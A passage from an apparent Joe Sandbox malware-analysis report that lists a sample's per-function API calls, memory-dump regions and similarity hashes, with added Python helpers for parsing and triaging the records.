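    call = call.rstrip(",")            # the report prints "...), ref:" with a comma
    args: List[str] = []
    if call.endswith(")"):
        paren = call.index("(")        # argument values in the report never contain '('
        args = call[paren + 1:-1].split(",")
        call = call[:paren]
    api, module = call.rsplit(".", 1)  # module is the last dotted component
    return ApiRef(api=api, module=module, args=args, ref=int(ref_hex, 16), subcall_of=subcall)


def summarize_record(lines: List[str]) -> Dict[str, List[str]]:
    """Triage one function record: modules touched, run-time resolution, recovered strings."""
    refs = [r for r in map(parse_api_ref, lines) if r is not None]
    return {
        "modules": sorted({r.module for r in refs}),
        "dynamic_resolution": sorted({r.api for r in refs if r.api in DYNAMIC_RESOLUTION}),
        # anything that is neither a hex constant nor '?' is a string the disassembler recovered
        "string_args": sorted({a for r in refs for a in r.args if not _HEX_OR_UNKNOWN.fullmatch(a)}),
    }


# Sample input copied from this report's CorExitProcess record (page data, not invented).
SAMPLE_RECORD = [
    "• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6FF93721,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D913D2",
    "• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D913E4",
    "• FreeLibrary.KERNEL32(00000000,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D91406",
]

if __name__ == "__main__":
    d = parse_dump_name("00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp")
    print(f"region 0x{d.base_address:X}: {d.protection}, {d.mem_type}")
    print(summarize_record(SAMPLE_RECORD))
```

                                                                                                                   Run over every record, the summary lets you skip functions whose only modules are LIBCMT/LIBVCRUNTIME/LIBCPMT and concentrate on those that combine run-time resolution with recovered strings; the .sdmp decoding separates the image's executable sections (0x20 at D81000) from the writable data (0x04 at DB3000) and the executable-and-writable region (0x40 at DB2000) that deserves a closer look.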
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98BBB
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98C84
                                                                                                                  • __freea.LIBCMT ref: 00D98CEB
                                                                                                                    • Part of subcall function 00D97381: RtlAllocateHeap.NTDLL(00000000,00D9935A,?,?,00D9935A,00000220,?,00000000,?), ref: 00D973B3
                                                                                                                  • __freea.LIBCMT ref: 00D98CFE
                                                                                                                  • __freea.LIBCMT ref: 00D98D0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423051803-0
                                                                                                                  • Opcode ID: 6ba31a73fd6b6a4d786bce99f6ee9a709d4c126892910de0b32e51c4e4327756
                                                                                                                  • Instruction ID: 054fac9b009c71e15bc6ef15feee8a238d2110df2e5fdbb6940fb179d5576821
                                                                                                                  • Opcode Fuzzy Hash: 6ba31a73fd6b6a4d786bce99f6ee9a709d4c126892910de0b32e51c4e4327756
                                                                                                                  • Instruction Fuzzy Hash: 3351BFB2601246AFEF216F65CC81EBB7AA9EF96B10F190129FD05E6151EF30DD10A770
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8BB1B
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB3A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB68
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBC3
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBDA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: b0f6e2e8615d278ba95768059799c82340b5b9268ae159d8881024fef947fda3
                                                                                                                  • Instruction ID: 4a2b629674e56c22525ee5005967baaa2467f76b1821862f02a7dc57c9a7283e
                                                                                                                  • Opcode Fuzzy Hash: b0f6e2e8615d278ba95768059799c82340b5b9268ae159d8881024fef947fda3
                                                                                                                  • Instruction Fuzzy Hash: 3341277590060ADFCB20EF65C4909AAB3F4FF08360B584A6BE496D7654DB30F985CB71
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D894C6
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D894D1
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8953F
                                                                                                                    • Part of subcall function 00D893C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D893E0
                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D894EC
                                                                                                                  • _Yarn.LIBCPMT ref: 00D89502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1088826258-0
                                                                                                                  • Opcode ID: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction ID: 36927654b3212abf823048b1a7bafe2152779ea13c336f6bb57befb803698d3c
                                                                                                                  • Opcode Fuzzy Hash: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction Fuzzy Hash: 0A01BC75A00211EBC706FB20D86957DBBA1FF85320B184149E84197381DF34AA42CBB1
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC), ref: 00DA1BBE
• GetLastError.KERNEL32(?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC,00000000,?,00D9702C), ref: 00DA1BC8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
• Instruction ID: f9bba14c2eb3cfcfd0144484d5e21db8f5e8298557f979501139dbe6055c02c1
• Opcode Fuzzy Hash: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
• Instruction Fuzzy Hash: 54E04F30685309FBFF102B61EC06F5E3F58AB12B91F184021F90DE81E2EB61D9509AB4
APIs
• GetConsoleOutputCP.KERNEL32(6FF93721,00000000,00000000,?), ref: 00D9F36C
  • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D9F5BE
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D9F604
• GetLastError.KERNEL32 ref: 00D9F6A7
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 2430fe011c87ec494ef5189b2e9f6af25b368d220f8379b483ba8392ae5b35f9
• Instruction ID: 269be6e52615b882b0cc585c6779064c4fca898b6571cebe82f407c471ac4a71
• Opcode Fuzzy Hash: 2430fe011c87ec494ef5189b2e9f6af25b368d220f8379b483ba8392ae5b35f9
• Instruction Fuzzy Hash: 2BD14975D00258EFCF15CFA8D8809AEBBB5FF49314F28456AE865EB352D630E941CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: d7161956f45c868e245dc8ff9af32c55e5cfae7badbcae5de9f2e16177fede26
• Instruction ID: e59d74052eaf4aeb701b44971657424896e7ff8f4fd31a6f9b6ad292b521f51e
• Opcode Fuzzy Hash: d7161956f45c868e245dc8ff9af32c55e5cfae7badbcae5de9f2e16177fede26
• Instruction Fuzzy Hash: 4051BF76A00206EFEF299F91D851BBAB7A4EF04B14F18452DE845876D1E731EC80CBB0
APIs
  • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
• GetLastError.KERNEL32 ref: 00D9D199
• __dosmaperr.LIBCMT ref: 00D9D1A0
• GetLastError.KERNEL32 ref: 00D9D1DA
• __dosmaperr.LIBCMT ref: 00D9D1E1
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
• Instruction ID: d1a7083fa3184a81d9d215e3fbb70d616e0f750529b803e911f2b4275ebaa60e
• Opcode Fuzzy Hash: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
• Instruction Fuzzy Hash: 6B219F72700305AFDF21AF6A8C8096BB7AAFF443A47148519F959A7251DB30ED40CBB0
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f03722bcd29c363325375607f4c523eb37c423c6a4b81c297f7b19d6d9520b2
• Instruction ID: 3ba9842fda5c4324ca8e6db3d3e04f64bba3ea26611249405f069a5415012712
• Opcode Fuzzy Hash: 2f03722bcd29c363325375607f4c523eb37c423c6a4b81c297f7b19d6d9520b2
• Instruction Fuzzy Hash: 3321A931604215BF9B28FF658C8096BB7A9FF40B647198A25F85AD7251EB30ED019FB0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00D9E533
  • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E56B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E58B
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
• Instruction ID: a062ab5a912473d4fac1d0ceaf684ad244b34322521b02687160583ff79f9581
• Opcode Fuzzy Hash: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
• Instruction Fuzzy Hash: 8311C0F5A15215FE6F6177B6AC89CBF6FACCF843A83150128F841D1201FA20DF0192B1
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
• GetCurrentThreadId.KERNEL32 ref: 00D816CB
• std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
• std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
• Opcode ID: eb2ef3b8ca8e52b18280172f1509ed4a87d2761644fc47492b45bfa58296f223
• Instruction ID: acabde55f8244096f8cb4f37f7a538f2973f3381ccc1db1300655912b092cdb3
• Opcode Fuzzy Hash: eb2ef3b8ca8e52b18280172f1509ed4a87d2761644fc47492b45bfa58296f223
• Instruction Fuzzy Hash: EE21D3B4E04209CFDB08EFA8D5926AEFBF5EF48300F05845DE889A7351DB399941CB61
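The records above all follow one fixed layout (an APIs list, a Memory Dump Source block, the IDA plugin snapshot, and a Similarity block of IDs and fuzzy hashes), which makes them easy to pull out of the report for triage or for matching functions across samples. The parser below is an added example and is not Joe Sandbox code. It assumes the layout seen in this report and that every record ends at its Instruction Fuzzy Hash line; the embedded sample is two records copied from the listing with their argument and Associated lists shortened, and the helper names (`parse_records`, `callers_of`, `shared_instruction_ids`) are ours.

```python
"""Parser for the per-function records of a Joe Sandbox report (APIs, Memory Dump Source,
Joe Sandbox IDA Plugin, Similarity). Added example, not Joe Sandbox code. Assumption: the
layout is the one visible in the report and every record ends at 'Instruction Fuzzy Hash'."""
import re

# Constructed sample: two records copied from the report with argument and Associated lists
# shortened; the 'Download File' link label left by the HTML export is kept so it gets stripped.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D), ref: 00DA1BBE
• GetLastError.KERNEL32(?,00DA1C4D,00000000), ref: 00DA1BC8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
• Instruction ID: f9bba14c2eb3cfcfd0144484d5e21db8f5e8298557f979501139dbe6055c02c1
• Opcode Fuzzy Hash: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
• Instruction Fuzzy Hash: 54E04F30685309FBFF102B61EC06F5E3F58AB12B91F184021F90DE81E2EB61D9509AB4
APIs
  • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000), ref: 00D974F2
• GetLastError.KERNEL32 ref: 00D9D199
• __dosmaperr.LIBCMT ref: 00D9D1A0
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
• Instruction ID: d1a7083fa3184a81d9d215e3fbb70d616e0f750529b803e911f2b4275ebaa60e
• Opcode Fuzzy Hash: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
• Instruction Fuzzy Hash: 6B219F72700305AFDF21AF6A8C8096BB7AAFF443A47148519F959A7251DB30ED40CBB0
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?(?P<name>[^.(]+)"
                    r"\.(?P<module>[A-Za-z0-9_]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^• Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>\w+)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_records(text):
    """One dict per function record; records without an APIs section still parse because a
    record opens at its first line and closes at its 'Instruction Fuzzy Hash' line."""
    records, rec, section = [], None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if rec is None:
            rec, section = {"apis": [], "strings": [], "source": None, "associated": [], "fields": {}}, None
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unparsed API line: {line}")
            rec["apis"].append(m.groupdict())  # 'caller' is None for a direct call
        elif section == "Strings":
            rec["strings"].append(line.lstrip("• ").strip())
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                rec["source"] = m.groupdict()
            elif line.startswith("• Associated: "):
                rec["associated"].append(line[len("• Associated: "):].removesuffix("Download File"))
        elif section in ("Joe Sandbox IDA Plugin", "Similarity"):
            m = KV_RE.match(line)
            if m:
                rec["fields"][m["key"]] = m["value"]
                if m["key"] == "Instruction Fuzzy Hash":  # last line of every record
                    records.append(rec)
                    rec = None
    if rec is not None:
        raise ValueError("input ends inside a record")
    return records


def callers_of(records, api_name):
    """Addresses (ref) where api_name is called directly; 'Part of subcall' lines belong to another function."""
    return sorted(a["ref"] for r in records for a in r["apis"] if a["name"] == api_name and a["caller"] is None)


def shared_instruction_ids(records_a, records_b):
    """Instruction IDs present in both listings: an exact-match first pass for spotting a function reused across reports."""
    ids = lambda rs: {r["fields"].get("Instruction ID") for r in rs}
    return ids(records_a) & ids(records_b)
```

Running `parse_records` over the full function listing instead of the sample yields one dict per record; `callers_of(records, "LoadLibraryExW")` then gives the `ref` addresses to jump to in the 00D80000-based dump, and `shared_instruction_ids` applied to two reports' listings shows which functions match exactly before any fuzzy-hash comparison is attempted.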
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D8AA68
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8AA72
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::_Lockit.LIBCPMT ref: 00D840AE
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::~_Lockit.LIBCPMT ref: 00D840D9
                                                                                                                  • codecvt.LIBCPMT ref: 00D8AAAC
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8AAE3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3716348337-0
                                                                                                                  • Opcode ID: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction ID: dca86890ad292cee8853a663e44467a35fda09e86b1319434b1a72bb4c1c1822
                                                                                                                  • Opcode Fuzzy Hash: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction Fuzzy Hash: 1B01C0B1900216DBCB09FB68D9596BEB7B5EF80320F29410AE811A7391DF749E00CBB1
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000), ref: 00DA6077
                                                                                                                  • GetLastError.KERNEL32(?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?,?,00D9F041,00000000), ref: 00DA6083
